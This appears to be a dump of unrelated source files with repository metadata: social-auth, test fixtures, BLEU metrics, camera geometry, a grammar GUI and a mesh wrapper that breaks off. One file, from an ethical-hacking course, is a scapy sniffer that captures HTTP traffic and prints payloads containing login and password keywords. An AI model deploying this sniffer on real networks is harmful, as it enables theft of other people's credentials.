2020-01-02T22:42:17.000Z
|
social_friends_finder/backends/vkontakte_backend.py
|
haremmaster/django-social-friends-finder
|
cad63349b19b3c301626c24420ace13c63f45ad7
|
[
"BSD-3-Clause"
] | 2 |
2015-01-01T16:34:59.000Z
|
2015-03-26T10:30:59.000Z
|
social_friends_finder/backends/vkontakte_backend.py
|
laplacesdemon/django-social-friends-finder
|
cad63349b19b3c301626c24420ace13c63f45ad7
|
[
"BSD-3-Clause"
] | 11 |
2015-01-16T18:39:34.000Z
|
2021-08-13T00:46:41.000Z
|
from social_friends_finder.backends import BaseFriendsProvider
from social_friends_finder.utils import setting
if not setting("SOCIAL_FRIENDS_USING_ALLAUTH", False):
from social_auth.backends.contrib.vk import VKOAuth2Backend
USING_ALLAUTH = False
else:
from allauth.socialaccount.models import SocialToken, SocialAccount, SocialApp
USING_ALLAUTH = True
import vkontakte
class VKontakteFriendsProvider(BaseFriendsProvider):
def fetch_friends(self, user):
"""
        fetches friends from VKontakte using the access_token
        fetched by django-social-auth.
Note - user isn't a user - it's a UserSocialAuth if using social auth, or a SocialAccount if using allauth
Returns:
collection of friend objects fetched from VKontakte
"""
if USING_ALLAUTH:
raise NotImplementedError("VKontakte support is not implemented for django-allauth")
#social_app = SocialApp.objects.get_current('vkontakte')
#oauth_token = SocialToken.objects.get(account=user, app=social_app).token
else:
social_auth_backend = VKOAuth2Backend()
# Get the access_token
tokens = social_auth_backend.tokens(user)
oauth_token = tokens['access_token']
api = vkontakte.API(token=oauth_token)
return api.get("friends.get")
def fetch_friend_ids(self, user):
"""
        fetches friend ids from VKontakte
Return:
collection of friend ids
"""
friend_ids = self.fetch_friends(user)
return friend_ids
| 33.4375 | 114 | 0.684112 | 1,215 | 0.757009 | 0 | 0 | 0 | 0 | 0 | 0 | 693 | 0.431776 |
1feefa448dd4d27276c85f5a38d04e04d811d4b4
| 56 |
py
|
Python
|
tests/cms_bundles/__init__.py
|
ff0000/scarlet
|
6c37befd810916a2d7ffff2cdb2dab57bcb6d12e
|
[
"MIT"
] | 9 |
2015-10-13T04:35:56.000Z
|
2017-03-16T19:00:44.000Z
|
tests/cms_bundles/__init__.py
|
ff0000/scarlet
|
6c37befd810916a2d7ffff2cdb2dab57bcb6d12e
|
[
"MIT"
] | 32 |
2015-02-10T21:09:18.000Z
|
2017-07-18T20:26:51.000Z
|
tests/cms_bundles/__init__.py
|
ff0000/scarlet
|
6c37befd810916a2d7ffff2cdb2dab57bcb6d12e
|
[
"MIT"
] | 3 |
2017-07-13T13:32:21.000Z
|
2019-04-08T20:18:58.000Z
|
default_app_config = 'tests.cms_bundles.apps.AppConfig'
| 28 | 55 | 0.839286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.607143 |
1ff9642e37e0136fb4ef1901be1925b6d57a71f4
| 2,543 |
py
|
Python
|
app/test/commonJSONStrings.py
|
rmetcalf9/dockJob
|
a61acf7ca52e37ff513695a5cc201d346fb4a7fa
|
[
"MIT"
] | 14 |
2018-03-28T20:37:56.000Z
|
2020-08-30T13:29:05.000Z
|
app/test/commonJSONStrings.py
|
rmetcalf9/dockJob
|
a61acf7ca52e37ff513695a5cc201d346fb4a7fa
|
[
"MIT"
] | 79 |
2018-02-07T14:42:00.000Z
|
2022-02-11T22:30:03.000Z
|
app/test/commonJSONStrings.py
|
rmetcalf9/dockJob
|
a61acf7ca52e37ff513695a5cc201d346fb4a7fa
|
[
"MIT"
] | 6 |
2018-05-08T21:49:40.000Z
|
2021-07-30T13:47:37.000Z
|
data_simpleJobCreateParams = {
"name": "TestJob",
"repetitionInterval": "HOURLY:03",
"command": "ls",
"enabled": True
}
data_simpleManualJobCreateParams = {
"name": "TestJob",
"repetitionInterval": "",
"command": "ls",
"enabled": False
}
data_simpleJobCreateExpRes = {
"guid": 'IGNORE',
"name": data_simpleJobCreateParams['name'],
"command": data_simpleJobCreateParams['command'],
"enabled": data_simpleJobCreateParams['enabled'],
"repetitionInterval": data_simpleJobCreateParams['repetitionInterval'],
"nextScheduledRun": 'IGNORE',
"creationDate": "IGNORE",
"lastUpdateDate": "IGNORE",
"lastRunDate": None,
"lastRunReturnCode": None,
"lastRunExecutionGUID": "",
"mostRecentCompletionStatus": "Unknown",
"pinned": False,
"overrideMinutesBeforeMostRecentCompletionStatusBecomesUnknown": None,
"AfterFailJobGUID": None,
"AfterFailJobNAME": None,
"AfterSuccessJobGUID": None,
"AfterSuccessJobNAME": None,
"AfterUnknownJobGUID": None,
"AfterUnknownJobNAME": None,
"StateChangeSuccessJobGUID": None,
"StateChangeSuccessJobNAME": None,
"StateChangeFailJobGUID": None,
"StateChangeFailJobNAME": None,
"StateChangeUnknownJobGUID": None,
"StateChangeUnknownJobNAME": None,
"objectVersion": 1
}
data_simpleManualJobCreateParamsWithAllOptionalFields = dict(data_simpleJobCreateParams)
data_simpleManualJobCreateParamsWithAllOptionalFields['pinned'] = True
data_simpleManualJobCreateParamsWithAllOptionalFields['overrideMinutesBeforeMostRecentCompletionStatusBecomesUnknown'] = 357
data_simpleManualJobCreateParamsWithAllOptionalFields['StateChangeSuccessJobGUID'] = '' #Can't provide valid non default value as other jobs don't exist
data_simpleManualJobCreateParamsWithAllOptionalFields['StateChangeFailJobGUID'] = '' #
data_simpleManualJobCreateParamsWithAllOptionalFields['StateChangeUnknownJobGUID'] = '' #
data_simpleManualJobCreateParamsWithAllOptionalFieldsExpRes = dict(data_simpleJobCreateExpRes)
data_simpleManualJobCreateParamsWithAllOptionalFieldsExpRes['pinned'] = True
data_simpleManualJobCreateParamsWithAllOptionalFieldsExpRes['overrideMinutesBeforeMostRecentCompletionStatusBecomesUnknown'] = 357
data_simpleJobExecutionCreateExpRes = {
"guid": 'IGNORE',
"stage": 'Pending',
"executionName": 'TestExecutionName',
"resultReturnCode": 0,
"jobGUID": 'OVERRIDE',
"jobName": 'TestJob',
"jobCommand": 'OVERRIDE',
"resultSTDOUT": '',
"manual": True,
"dateCreated": 'IGNORE',
"dateStarted": 'IGNORE',
"dateCompleted": 'IGNORE'
}
| 35.319444 | 152 | 0.773889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,278 | 0.502556 |
1ff9b69a4019a1762d86b4de69764598a30ea2b6
| 8,228 |
py
|
Python
|
dial/metrics.py
|
neukg/KAT-TSLF
|
91bff10312ba5fbbd46978b268a1c97a5d627dcd
|
[
"MIT"
] | 11 |
2021-11-19T06:17:10.000Z
|
2022-03-11T07:12:30.000Z
|
dial/metrics.py
|
neukg/KAT-TSLF
|
91bff10312ba5fbbd46978b268a1c97a5d627dcd
|
[
"MIT"
] | 3 |
2021-11-20T14:00:24.000Z
|
2022-03-03T19:41:01.000Z
|
dial/metrics.py
|
neukg/KAT-TSLF
|
91bff10312ba5fbbd46978b268a1c97a5d627dcd
|
[
"MIT"
] | null | null | null |
from nltk.translate.bleu_score import corpus_bleu, sentence_bleu, SmoothingFunction
from nltk import word_tokenize
# import language_evaluation
from typing import List
from collections import defaultdict, Counter
import re
import math
import sys
def mean(lst):
return sum(lst) / len(lst)
def _calc_ngram_dict(tokens:List[str], ngram:int, dict_ref=None):
ngram_dict = defaultdict(int) if dict_ref is None else dict_ref
total = len(tokens)
for i in range(0, total - ngram + 1):
item = tuple(tokens[i:i + ngram])
ngram_dict[item] += 1
return ngram_dict
def _calc_cover(cand, gold, ngram):
cand_dict = _calc_ngram_dict(cand, ngram)
gold_dict = _calc_ngram_dict(gold, ngram)
cover = 0
total = 0
for token, freq in cand_dict.items():
if token in gold_dict:
cover += min(freq, gold_dict[token])
total += freq
return cover, total
def _calc_cover_rate(cands, golds, ngram):
"""
    Corpus-level modified n-gram precision: the fraction of candidate n-grams
    covered by the corresponding reference n-grams.
"""
cover = 0.0
total = 0.000001
for cand_tokens, gold_tokens in zip(cands, golds):
cur_cover, cur_total = _calc_cover(cand_tokens, gold_tokens, ngram)
cover += cur_cover
total += cur_total
return cover / total
def _calc_bp(cands, golds):
c_count = 0.000001
r_count = 0.0
for cand_tokens, gold_tokens in zip(cands, golds):
c_count += len(cand_tokens)
r_count += len(gold_tokens)
bp = 1
if c_count < r_count:
bp = math.exp(1 - r_count / c_count)
return bp
def calc_corpus_bleu(cands, golds):
bp = _calc_bp(cands, golds)
cover_rate1 = _calc_cover_rate(cands, golds, 1)
cover_rate2 = _calc_cover_rate(cands, golds, 2)
cover_rate3 = _calc_cover_rate(cands, golds, 3)
bleu1 = 0
bleu2 = 0
bleu3 = 0
if cover_rate1 > 0:
bleu1 = bp * math.exp(math.log(cover_rate1))
if cover_rate2 > 0:
bleu2 = bp * math.exp((math.log(cover_rate1) + math.log(cover_rate2)) / 2)
if cover_rate3 > 0:
bleu3 = bp * math.exp((math.log(cover_rate1) + math.log(cover_rate2) + math.log(cover_rate3)) / 3)
return bleu1, bleu2, bleu3
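def _example_corpus_bleu():
    """Hedged usage sketch (added for illustration; not called anywhere):
    inputs are lists of already-tokenised candidate and reference sentences."""
    cands = [["the", "cat", "sat", "on", "the", "mat"]]
    golds = [["the", "cat", "is", "on", "the", "mat"]]
    return calc_corpus_bleu(cands, golds)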
# def calc_corpus_bleu_new(cands, golds):
# golds = [[gold] for gold in golds]
# sf = SmoothingFunction().method7
# bleu1 = corpus_bleu(golds, cands, smoothing_function=sf, weights=[1, 0, 0, 0])
# bleu2 = corpus_bleu(golds, cands, smoothing_function=sf, weights=[0.5, 0.5, 0, 0])
# bleu3 = corpus_bleu(golds, cands, smoothing_function=sf, weights=[0.34, 0.33, 0.33, 0])
# return bleu1, bleu2, bleu3
def calc_sentence_bleu(cands, golds):
bleu1 = []
bleu2 = []
bleu3 = []
sf = SmoothingFunction().method7
for hyp, ref in zip(cands, golds):
try:
b1 = sentence_bleu([ref], hyp, smoothing_function=sf, weights=[1, 0, 0, 0])
except ZeroDivisionError:
b1 = 0.0
try:
b2 = sentence_bleu([ref], hyp, smoothing_function=sf, weights=[0.5, 0.5, 0, 0])
except ZeroDivisionError:
b2 = 0.0
try:
b3 = sentence_bleu([ref], hyp, smoothing_function=sf, weights=[0.34, 0.33, 0.33, 0])
except ZeroDivisionError:
b3 = 0.0
bleu1.append(b1)
bleu2.append(b2)
bleu3.append(b3)
return mean(bleu1), mean(bleu2), mean(bleu3)
def calc_corpus_bleu_new(hypothesis, references):
# hypothesis = [normalize_answer(hyp).split(" ") for hyp in hypothesis]
# references = [[normalize_answer(ref).split(" ")] for ref in references]
references = [[gold] for gold in references]
sf = SmoothingFunction(epsilon=1e-12).method1
b1 = corpus_bleu(references, hypothesis, weights=(1.0/1.0,), smoothing_function=sf)
b2 = corpus_bleu(references, hypothesis, weights=(1.0/2.0, 1.0/2.0), smoothing_function=sf)
b3 = corpus_bleu(references, hypothesis, weights=(1.0/3.0, 1.0/3.0, 1.0/3.0), smoothing_function=sf)
b4 = corpus_bleu(references, hypothesis, weights=(1.0/4.0, 1.0/4.0, 1.0/4.0, 1.0/4.0), smoothing_function=sf)
return b1, b2, b3, b4
def _calc_distinct_ngram(cands, ngram):
ngram_total = 0.00001
ngram_distinct_count = 0.00001
pred_dict = defaultdict(int)
for cand_tokens in cands:
_calc_ngram_dict(cand_tokens, ngram, pred_dict)
for key, freq in pred_dict.items():
ngram_total += freq
ngram_distinct_count += 1
return ngram_distinct_count / ngram_total
def _calc_sent_distinct_ngram(cand, ngram):
ngram_total = 0.0000000001
ngram_distinct_count = 0.0
ngram_dict = defaultdict(int)
for i in range(0, len(cand) - ngram + 1):
item = tuple(cand[i:i + ngram])
ngram_dict[item] += 1
for _, freq in ngram_dict.items():
ngram_total += freq
ngram_distinct_count += 1
return ngram_distinct_count / ngram_total
def calc_corpus_distinct(cands):
distinct1 = _calc_distinct_ngram(cands, 1)
distinct2 = _calc_distinct_ngram(cands, 2)
return distinct1, distinct2
def calc_sentence_distinct(cands):
distinct1 = mean([_calc_sent_distinct_ngram(c, 1) for c in cands])
distinct2 = mean([_calc_sent_distinct_ngram(c, 2) for c in cands])
return distinct1, distinct2
def calc_corpus_f1(cands, golds):
golden_word_total = 0.00000001
pred_word_total = 0.00000001
hit_word_total = 0.00000001
for response, golden_response in zip(cands, golds):
common = Counter(response) & Counter(golden_response)
hit_word_total += sum(common.values())
golden_word_total += len(golden_response)
pred_word_total += len(response)
p = hit_word_total / pred_word_total
r = hit_word_total / golden_word_total
f1 = 2 * p * r / (p + r)
return f1
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
re_art = re.compile(r'\b(a|an|the)\b')
re_punc = re.compile(r'[!"#$%&()*+,-./:;<=>?@\[\]\\^`{|}~_\']')
def remove_articles(text):
return re_art.sub(' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
return re_punc.sub(' ', text) # convert punctuation to spaces
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s)))).split(' ')
def calc_rouge(cands, golds):
    # NOTE: requires the optional 'language_evaluation' package; its import is commented out above.
    rouge_evaluator = language_evaluation.RougeEvaluator(num_parallel_calls=1, tokenization_fn=normalize_answer)
predictions = [' '.join(c) for c in cands]
answers = [' '.join(g) for g in golds]
rouge_result = rouge_evaluator.run_evaluation(predictions, answers)
return rouge_result
def dialogue_evaluation(ori_cands, ori_golds):
assert len(ori_cands) == len(ori_golds), f"num cand: {len(ori_cands)}, num gold: {len(ori_golds)}"
cands = []
golds = []
help_tokenize = lambda x: word_tokenize(x.lower())
for cand, gold in zip(ori_cands, ori_golds):
cands.append(help_tokenize(cand.lower()))
golds.append(help_tokenize(gold.lower()))
cbleu1, cbleu2, cbleu3, cbleu4 = calc_corpus_bleu_new(cands, golds)
sbleu1, sbleu2, sbleu3 = calc_sentence_bleu(cands, golds)
cdiv1, cdiv2 = calc_corpus_distinct(cands)
sdiv1, sdiv2 = calc_sentence_distinct(cands)
cf1 = calc_corpus_f1(cands, golds)
# rouge_result = calc_rouge(cands, golds)
result = {
'cf1': cf1,
'bleu1': cbleu1,
'bleu2': cbleu2,
'bleu3': cbleu3,
'bleu4': cbleu4,
'dist1': cdiv1,
'dist2': cdiv2,
}
# result.update(rouge_result)
result = {k: round(100 * v, 6) for k, v in result.items()}
return result
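def _example_dialogue_evaluation():
    """Hedged usage sketch (added for illustration; not called anywhere):
    toy candidate/reference pairs; scores are returned as percentages."""
    cands = ["i like the blue one", "sure , see you there"]
    golds = ["i like the red one", "sure , see you tomorrow"]
    return dialogue_evaluation(cands, golds)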
def file_dialogue_evaluation(cand_file, gold_file):
print(f"cand file: {cand_file}, gold file: {gold_file}")
cands = []
golds = []
with open(cand_file, 'r', encoding='utf-8') as f:
for line in f:
cands.append(line.strip())
with open(gold_file, 'r', encoding='utf-8') as f:
for line in f:
golds.append(line.strip())
results = dialogue_evaluation(cands, golds)
print(results)
if __name__ == "__main__":
cand_file = sys.argv[1]
gold_file = sys.argv[2]
file_dialogue_evaluation(cand_file, gold_file)
| 35.465517 | 113 | 0.653986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,050 | 0.127613 |
1ffa89e42119c66f0b38cae0145de37c497cd8de
| 896 |
py
|
Python
|
06_packet_sniffer/packet_sniffer.py
|
maks-nurgazy/ethical-hacking
|
0f9f2b943b5afa9b11251270e4672e0965ec1769
|
[
"MIT"
] | null | null | null |
06_packet_sniffer/packet_sniffer.py
|
maks-nurgazy/ethical-hacking
|
0f9f2b943b5afa9b11251270e4672e0965ec1769
|
[
"MIT"
] | null | null | null |
06_packet_sniffer/packet_sniffer.py
|
maks-nurgazy/ethical-hacking
|
0f9f2b943b5afa9b11251270e4672e0965ec1769
|
[
"MIT"
] | null | null | null |
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return (packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path).decode("utf-8")
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load.decode("utf-8")
keywords = ["uname", "username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
if url:
print("[+] HTTP Request >> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible username/password > " + login_info + "\n\n")
sniff("eth0")
| 27.151515 | 90 | 0.631696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 133 | 0.148438 |
1ffb6e885c207ea205ef242e09f2cabe5866ad26
| 3,705 |
py
|
Python
|
cameraToWorld.py
|
blguweb/Tap-Tap-computer
|
4e2007b5a31e6d5f902b1e3ca58206870331ef07
|
[
"MIT"
] | null | null | null |
cameraToWorld.py
|
blguweb/Tap-Tap-computer
|
4e2007b5a31e6d5f902b1e3ca58206870331ef07
|
[
"MIT"
] | null | null | null |
cameraToWorld.py
|
blguweb/Tap-Tap-computer
|
4e2007b5a31e6d5f902b1e3ca58206870331ef07
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from typing import NoReturn
import cv2 as cv
import numpy as np
from numpy import mat
import xml.etree.ElementTree as ET
import math
camera_angle = 315
camera_intrinsic = {
    # # camera intrinsic matrix
    # camera intrinsic matrix, obtained with MATLAB
"camera_matrix": [871.086328150675740,0.0, 314.319098669115306,
0.0, 868.410697770935144, 254.110678266434348,
0.0, 0.0, 1.0],
    # distortion coefficients
"camera_distortion": [0.182040359674805,-0.564946010535902,0.001566542339394, 0.003396709692351,0.000000000000000 ],
    # # # rotation vector
"camera_rvec": [-1.57079633, 0.0, 0.0],
    # translation vector
# "camera_tvec": ['-29.046143504451425', '1126.526303382564', '736.155158603123']
"camera_tvec": [0.0, 0.0, 0.0],
    # # rotation matrix
# "rvec_matrix": [[1.0,0.0,0.0],
# [0.0,0.0,-1.0],
# [0.0,1.0,0.0]]
}
class CtoWorld(object):
def __init__(self):
self.image_size = (640 , 480)
self.rvec = np.asarray(camera_intrinsic['camera_rvec'])
self.cam_mat = np.asarray(camera_intrinsic['camera_matrix'])
self.tvec = np.asarray(camera_intrinsic['camera_tvec'])
self.cam_dist = np.asarray(camera_intrinsic['camera_distortion'])
self.rot_mat = mat(cv.Rodrigues(self.rvec)[0])
# self.cam_mat_new, roi = cv.getOptimalNewCameraMatrix(self.cam_mat, self.cam_dist, self.image_size, 1, self.image_size)
# self.roi = np.array(roi)
def pixel_c(self,points,depth):
        # pixel coordinates -> camera coordinates
p= (depth*np.asarray(points)).T
p = mat(p, np.float).reshape((3,1))
self.cam_mat = mat(self.cam_mat, np.float).reshape((3, 3))
ca_points =np.dot( np.linalg.inv(self.cam_mat),p)
print("c",ca_points)
return ca_points
def c_w(self,points):
revc = mat(self.rot_mat, np.float).reshape((3, 3))
T = mat(self.tvec, np.float).reshape((3, 1))
w_points = np.dot(revc,points)+T
print("w",w_points)
return w_points
def imu_get(self,message):
mess = message.split()
z = float(mess[0])
x = float(mess[1])
y = float(mess[2])
print("3",x,y,z)
return x,y,z
def unit_vector_get(self,vx,vy,vz):
        # angle between the camera heading and north
        c_to_n = camera_angle
        # compute the angles
        # west, so the value is negative
        # xita is measured from -y: clockwise positive, counter-clockwise negative; c_to_n - (-vz)
        xita = c_to_n + vz
        fai = vx + 90
        print("fai",fai,xita)
        # direction unit vector
uz = math.cos(math.radians(fai))
print("uz",uz)
ux = - math.sin(math.radians(xita)) * math.sin(math.radians(fai))
uy = - math.cos(math.radians(xita)) * math.sin(math.radians(fai))
vec = [ux,uy,uz]
print("vtype",vec)
return vec
def target_not(self,unot,uvector):
        # need to know which plane the ray hits
        # e.g. the y plane
tx = uvector[0] * (-unot[1]) / uvector[1] + unot[0]
tz = uvector[2] * (-unot[1]) / uvector[1] + unot[2]
return tx,tz
if __name__ == '__main__':
    mctoworld = CtoWorld()  # create the rectification object
    # pixel coordinates x, y, depth
points = [355,218,1]
depth = 1540
    # camera coordinates
camera_points = mctoworld.pixel_c(points,depth)
w_points = mctoworld.c_w(camera_points)
# IMU
mes = "-42.60 6.91 0.67"
x,y,z = mctoworld.imu_get(mes)
mvector = mctoworld.unit_vector_get(x,y,z)
tx,tz = mctoworld.target_not(w_points,mvector)
print("tx: ",tx)
print("tz: ",tz)
if -2000 < tx < -1380 and 840 < tz < 1300:
print("true")
else:
print("false")
| 33.080357 | 129 | 0.550877 | 2,268 | 0.580794 | 0 | 0 | 0 | 0 | 0 | 0 | 993 | 0.254289 |
1ffb6f2d2eca765ba18ee0ccc397d70767e06533
| 5,004 |
py
|
Python
|
compilers/labs/lab2/gui.py
|
vampy/university
|
9496cb63594dcf1cc2cec8650b8eee603f85fdab
|
[
"MIT"
] | 6 |
2015-06-22T19:43:13.000Z
|
2019-07-15T18:08:41.000Z
|
compilers/labs/lab2/gui.py
|
vampy/university
|
9496cb63594dcf1cc2cec8650b8eee603f85fdab
|
[
"MIT"
] | null | null | null |
compilers/labs/lab2/gui.py
|
vampy/university
|
9496cb63594dcf1cc2cec8650b8eee603f85fdab
|
[
"MIT"
] | 1 |
2015-09-26T09:01:54.000Z
|
2015-09-26T09:01:54.000Z
|
#!/usr/bin/python
import os
from log import Log
from enum import IntEnum, unique
from grammar import Grammar
from automaton import FiniteAutomaton
@unique
class Command(IntEnum):
GRAMMAR_READ = 1
GRAMMAR_DISPLAY = 2
GRAMMAR_VERIFY = 3
AUTOMATON_READ = 4
AUTOMATON_DISPLAY = 5
CONVERT_RG_TO_FA = 6
CONVERT_FA_TO_RG = 7
HELP = 99
QUIT = 0
class Gui:
@staticmethod
def run():
Log.info('Running...')
try:
grammar = Grammar.from_lines(Gui.get_lines_filename('grammar.rg'))
print(grammar, grammar.is_regular(), grammar.is_left, grammar.is_right, end='\n' * 2)
print(grammar.to_finite_automaton(), end='\n' * 2)
except Exception as e:
Log.error(grammar.error_message)
Log.error(str(e))
try:
automaton = FiniteAutomaton.from_lines(Gui.get_lines_filename('automata.fa'))
print(automaton, end='\n' * 2)
print(automaton.to_regular_grammar())
except Exception as e:
Log.error(str(e))
Gui.print_help_menu()
grammar, automaton = None, None
while True:
try:
command = Command(Gui.get_int('>>> '))
if command is Command.QUIT:
print('\n\nQuitting...')
break
elif command is Command.HELP:
Gui.print_help_menu()
elif command is Command.GRAMMAR_READ:
filename = Gui.get_string('Filename = ')
grammar = Grammar.from_lines(Gui.get_lines_filename(filename))
Log.success('Success')
elif command is Command.GRAMMAR_DISPLAY or command is Command.CONVERT_RG_TO_FA:
if grammar is None:
raise Exception('Please read a RG')
if command is Command.GRAMMAR_DISPLAY:
print(grammar)
else:
print(grammar.to_finite_automaton())
Log.success('Success')
elif command is Command.GRAMMAR_VERIFY:
if grammar is None:
raise Exception('Please read a RG')
is_regular = grammar.is_regular()
if is_regular:
Log.success('Grammar is {0} regular'.format('left' if grammar.is_left else 'right'))
else:
Log.error('Grammar is NOT regular')
elif command is Command.AUTOMATON_READ:
filename = Gui.get_string('Filename = ')
automaton = FiniteAutomaton.from_lines(Gui.get_lines_filename(filename))
Log.success('Success')
elif command is Command.AUTOMATON_DISPLAY or command is Command.CONVERT_FA_TO_RG:
if automaton is None:
raise Exception('Please read a FA')
if command is Command.AUTOMATON_DISPLAY:
print(automaton)
else:
print(automaton.to_regular_grammar())
Log.success('Success')
else:
print(command)
except Exception as e:
Log.error(str(e))
@staticmethod
def get_lines_filename(filename):
if not os.path.exists(filename):
            raise FileNotFoundError('The file "{0}" does not exist'.format(filename))
with open(filename, 'r') as f:
lines = f.readlines()
return lines
@staticmethod
def print_help_menu():
print('{0}. Read grammar'.format(Command.GRAMMAR_READ))
print('{0}. Display grammar'.format(Command.GRAMMAR_DISPLAY))
print('{0}. Verify grammar'.format(Command.GRAMMAR_VERIFY), end='\n' * 2)
print('{0}. Read FA'.format(Command.AUTOMATON_READ))
print('{0}. Display FA'.format(Command.AUTOMATON_DISPLAY), end='\n' * 2)
print('{0}. Convert RG to FA'.format(Command.CONVERT_RG_TO_FA))
        print('{0}. Convert FA to RG'.format(Command.CONVERT_FA_TO_RG), end='\n' * 2)
print('{0}. Help menu'.format(Command.HELP))
print('{0}. Quit'.format(Command.QUIT), end='\n' * 2)
@staticmethod
def get_int(prompt, prompt_retry='Retry again..', is_retry=False):
if is_retry:
print(prompt_retry)
try:
return int(Gui.get_string(prompt))
except ValueError:
return Gui.get_int(prompt, prompt_retry, True)
@staticmethod
def get_string(prompt):
try:
# Do not allow empty input
user_input = input(prompt)
if not user_input:
return Gui.get_string(prompt)
return user_input
except EOFError: # Ctrl-D
return Command.QUIT
except KeyboardInterrupt: # Ctrl-C
return Command.QUIT
| 33.139073 | 108 | 0.552158 | 4,843 | 0.967826 | 0 | 0 | 4,812 | 0.961631 | 0 | 0 | 539 | 0.107714 |
1ffbe3042328109603927698807569c875283801
| 180 |
py
|
Python
|
atividades/ex31.py
|
Fleen66/Python_exercises
|
fd05fdf1181da833a1a1bc9f4a476afc8f467977
|
[
"MIT"
] | null | null | null |
atividades/ex31.py
|
Fleen66/Python_exercises
|
fd05fdf1181da833a1a1bc9f4a476afc8f467977
|
[
"MIT"
] | null | null | null |
atividades/ex31.py
|
Fleen66/Python_exercises
|
fd05fdf1181da833a1a1bc9f4a476afc8f467977
|
[
"MIT"
] | null | null | null |
distancia = int(input('Digite a distancia de sua viagem: '))
if distancia <= 200:
preco = distancia * 0.50
print(preco)
else:
preco = distancia * 0.40
print(preco)
| 22.5 | 60 | 0.644444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.2 |
1ffc42584a05c85ceb4b5e649094a2917f366627
| 7,947 |
py
|
Python
|
src/triangle.py
|
songrun/VectorSkinning
|
a19dff78215b51d824adcd39c7dcdf8dc78ec617
|
[
"Apache-2.0"
] | 18 |
2015-04-29T20:54:15.000Z
|
2021-12-13T17:48:05.000Z
|
src/triangle.py
|
songrun/VectorSkinning
|
a19dff78215b51d824adcd39c7dcdf8dc78ec617
|
[
"Apache-2.0"
] | null | null | null |
src/triangle.py
|
songrun/VectorSkinning
|
a19dff78215b51d824adcd39c7dcdf8dc78ec617
|
[
"Apache-2.0"
] | 8 |
2017-04-23T17:52:13.000Z
|
2022-03-14T11:01:56.000Z
|
import sys
import subprocess
import os
from numpy import asarray
#triangle_path = os.path.join( "C:\\Users\\Mai\\Dropbox\\Research\\Deformation\\src\\py\\triangle", "triangle.exe")
triangle_path = os.path.join( os.path.dirname( __file__ ), "triangle", "triangle" )
if not os.path.exists( triangle_path ):
raise ImportError, "Triangle not found: " + triangle_path
def triangles_for_points( points, boundary_edges = None ):
'''
Given a sequence of 2D points 'points' and
optional sequence of 2-tuples of indices into 'points' 'boundary_edges',
    returns the (possibly refined) list of points together with a
    triangulation given as a sequence of length-three tuples ( i, j, k ),
    where i,j,k are the indices of the triangle's vertices in the returned points.
If 'boundary_edges' is not specified or is an empty sequence,
a convex triangulation will be returned.
Otherwise, 'boundary_edges' indicates the boundaries of the desired mesh.
'''
import os, subprocess
### http://www.cs.cmu.edu/~quake/triangle.switch.html
## -q Quality mesh generation with no angles smaller than 20 degrees. An alternate minimum angle may be specified after the `q'.
## -a Imposes a maximum triangle area constraint. A fixed area constraint (that applies to every triangle) may be specified after the `a', or varying area constraints may be read from a .poly file or .area file.
## -g Outputs the mesh to an Object File Format (.off) file, suitable for viewing with the Geometry Center's Geomview package.
options = [ '-q', '-a100', '-g' ]
# options = [ '-q' ]
if boundary_edges is None: boundary_edges = []
if len( boundary_edges ) == 0:
input_path = write_node_file( points )
print triangle_path, input_path
subprocess.call( [ triangle_path ] + options + [ input_path ] )
else:
input_path = write_poly_file( points, boundary_edges )
## -p Triangulates a Planar Straight Line Graph (.poly file).
subprocess.call( [ triangle_path ] + options + [ '-p', input_path ] )
ele_path = os.path.splitext( input_path )[0] + '.1.ele'
triangles = read_ele_file( ele_path )
node_path = os.path.splitext( input_path )[0] + '.1.node'
points = read_node_file( node_path)
#os.remove( poly_path )
#os.remove( ele_path )
return points, triangles
def __write_node_portion_of_file_to_object( obj, points, boundary_indices = set() ):
'''
Given an object 'obj' that can be passed as a parameter to
print >> 'obj', "Something to print",
a sequence of 2D points 'points', and
an optional set of indices in 'points' that are to be considered 'boundary_indices',
writes the '.node' portion of the file suitable for passing to 'triangle'
( http://www.cs.cmu.edu/~quake/triangle.node.html ).
Does not return a value.
'''
## 'points' must be a non-empty sequence of x,y positions.
points = asarray( points )
assert points.shape == ( len( points ), 2 )
assert points.shape[0] > 0
## The elements in 'boundary_indices' must be a subset of indices into 'points'.
## NOTE: set.issuperset() returns True if the sets are the same.
assert set(range(len(points))).issuperset( boundary_indices )
print >> obj, '## The vertices'
print >> obj, len( points ), 2, 0, len( boundary_indices )
for i, ( x, y ) in enumerate( points ):
print >> obj, i, x, y, ( 1 if i in boundary_indices else 0 )
def write_poly_file( points, boundary_edges ):
'''
Given a sequence of 2D points 'points'
and a potentially empty sequence 'boundary_edges' of
2-tuples of indices into 'points',
writes a '.poly' file suitable for passing to 'triangle'
( http://www.cs.cmu.edu/~quake/triangle.poly.html )
and returns the path to the '.poly' file.
'''
## Each of the two elements of each 2-tuple in 'boundary_edges'
## must be indices into 'points'.
assert all([ i >= 0 and i < len( points ) and j >= 0 and j < len( points ) and i != j for i,j in boundary_edges ])
## They must be unique and undirected.
assert len( boundary_edges ) == len( set([ frozenset( edge ) for edge in boundary_edges ]) )
## Create 'boundary_indices', the set of all indices that appear
## in 'boundary_edges'.
boundary_indices = frozenset( asarray( boundary_edges ).ravel() )
import tempfile
## This only works on Python 2.6+
#poly_file = tempfile.NamedTemporaryFile( suffix = '.poly', delete = False )
#poly_file_name = poly_file.name
poly_file, poly_file_name = tempfile.mkstemp( suffix = '.poly' )
